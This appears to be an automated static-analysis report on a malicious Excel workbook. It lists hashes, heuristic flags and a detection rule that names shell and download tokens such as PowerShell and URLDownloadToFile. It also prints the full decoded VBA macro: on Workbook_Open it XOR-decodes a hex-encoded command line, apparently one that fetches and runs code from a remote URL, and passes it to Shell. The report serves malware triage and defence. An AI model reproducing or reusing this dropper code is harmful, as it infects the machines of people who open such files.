Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 671015570338f526…

MALICIOUS

Office (OOXML) / .XLSX

153.2 KB Created: 2020-03-17 22:13:01 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2020-05-25
MD5: 7906950d3dd3bff86d65b514418b2910 SHA-1: 4c9b4c42c16471ff32758337fd66a35fc4d62695 SHA-256: 671015570338f52663157da906eb6f24e1f5298146f07d25b914af9795984ad4
130 Risk Score

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell (o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Public Sub Workbook_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3386 bytes
SHA-256: 848e2e71c218d22d14c5b3ef64ae890fc6107f4bf973b1a45fcdc3a8b7d003b5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Sub Workbook_Open()
Dim Z×°Ÿ³ÇŸº³ì•¾™™¹¾y††Déºà½Y´–Œ•…¤°¹œ½½•¶°i¥–ņ•¼³±œ§†XØ As String
Dim ¤i•ÌÕ•m••»¾OÕœàì¼Õñöyñº½ñ½œø°´¹§†È¼±•¾·à¬™†¾¾ÌO×B€•â¾™½ As String
Dim é–¤´–·•±Õ•ñ°î±º³ñ„Â¼é¹§àœ±•¾â¥•Œ•´½ÇNZ……½ä¹§øN»§´‚Ÿ°ñ± As String
Dim o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª As String
Dim cc As String
Dim •§‚î…mX§•ìÇî¹î•™‚§y‚¾Ÿâ½w•wÃAŸ™DÕÌñ¾Y¹•–×§ä™§Zؼ½¾½à…‚ As String
•§‚î…mX§•ìÇî¹î•™‚§y‚¾Ÿâ½w•wÃAŸ™DÕÌñ¾Y¹•–×§ä™§Zؼ½¾½à…‚ = "intXOintXOrValue1rVintXOrValue1alue1"
o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª = •§‚î…mX§•ìÇî¹î•™‚§y‚¾Ÿâ½w•wÃAŸ™DÕÌñ¾Y¹•–×§ä™§Zؼ½¾½à…‚ + (Replace(a("XXXXXXX", "3B353C78773B782837782000782F3D2A782000782B303D3434763D203D78753D203D3B2D782000782C313736283734313B21783A2128392B2B7878200078750F7810313C3C3D3678753B3778200078353539363C7870363D2F75373A323D3B2C780B212B2C3D3576163D2C760F3D3A1B34313D362C71761C372F363437393C1E31343D707F302C2C2862777728372B29312C76363D2C770C0C77606D68696B6D763D203D7F747C3D362E620C3D3528737F04363D782000782F3E3178200078343D761D203D7F716370163D2F75173A323D3B2C78753B782000783735780B303D3434767820007819282834313B392C31373671760B303D34341D203D3B2D2C3D707C3D362E620C3D782000783528737F04363D2F3E7820007831343D761D203D7F71"), " xX " + cc, ""))
o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª = Replace(o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª, •§‚î…mX§•ìÇî¹î•™‚§y‚¾Ÿâ½w•wÃAŸ™DÕÌñ¾Y¹•–×§ä™§Zؼ½¾½à…‚, "")
Shell (o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª)
End Sub
    Public Function a(CodeKey As String, DataIn As String) As String
        Dim lonDataPtr As Long
        Dim strDataOut As String
        Dim intXOrValue1 As Integer
        Dim intXOrValue2 As Integer
        For lonDataPtr = 1 To (Len(DataIn) / 2)
            intXOrValue1 = Val("&H" & (Mid$(DataIn, (2 * lonDataPtr) - 1, 2)))
            intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr Mod Len(CodeKey)) + 1), 1))
            strDataOut = strDataOut + Chr(intXOrValue1 Xor intXOrValue2)
        Next lonDataPtr
        a = strDataOut
    End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 15872 bytes
SHA-256: a3b7735144f16243ecbb11276ee7309945b5e80fa7ab85b1821793ea72040363
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).